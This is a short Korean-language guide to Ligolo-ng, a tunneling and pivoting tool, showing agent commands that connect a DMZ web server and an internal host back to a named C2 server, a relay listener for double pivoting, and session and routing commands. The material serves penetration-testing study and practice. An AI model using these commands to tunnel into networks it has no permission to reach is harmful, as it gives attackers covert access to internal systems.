Ligolo-ng

Ligolo-ng는 리버스 TCP/TLS 연결을 통해 tun 인터페이스를 생성하여 대상의 내부망에 로컬 영역과 같이 접근할 수 있도록 해주는 피벗팅 도구입니다. SOCKS 프록시로 터널을 구성한 경우, proxychains를 사용해야지만 대상 네트워크에 패킷이 전송되는 것과 다르게, 로컬 네트워크 인터페이스를 생성하기 때문에 별도의 명령은 요구되지 않습니다.

Ligolo-ng의 특징으로는 다중 피벗팅 상황이 거듭되다 보면 복잡해지는 연결 구성 없이, 안정적이고 간편하게 터널을 구축할 수 있는 것입니다.

GitHub - nicocha30/ligolo-ng: An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.GitHub

• C2 서버 : 15.164.250.107

• DMZ 웹 서버 : 192.168.145.155

# proxy 서버 생성 
./proxy -selfcert

# 에이전트 실행으로 서버로 연결 수립
./agent -connect 15.164.250.107:11601 -ignore-cert

# 내부망 -> DMZ 호스트 -> C2 서버로 연결 수립. 프록시 서버 터미널에서 리스너 생성
listener_add --addr 0.0.0.0:11600 --to 127.0.0.1:11601 --tcp

# 내부망 호스트에서 에이전트 실행으로 연결 수립
./agent -connect 192.168.145.155:11600 -ignore-cert

연결이 수립된다면 프록시 서버에는 커넥션이 맺어졌다는 메시지가 출력됩니다. 세션 리스트를 통해 연결할 세션을 선택한 후, 라우팅하여 인터페이스를 생성합니다.

# 세션 선택
session

# 인터페이스 생성
autoroute

# 인터페이스 리스트
iflist

# 인터페이스 삭제
ifdel --name <interface name>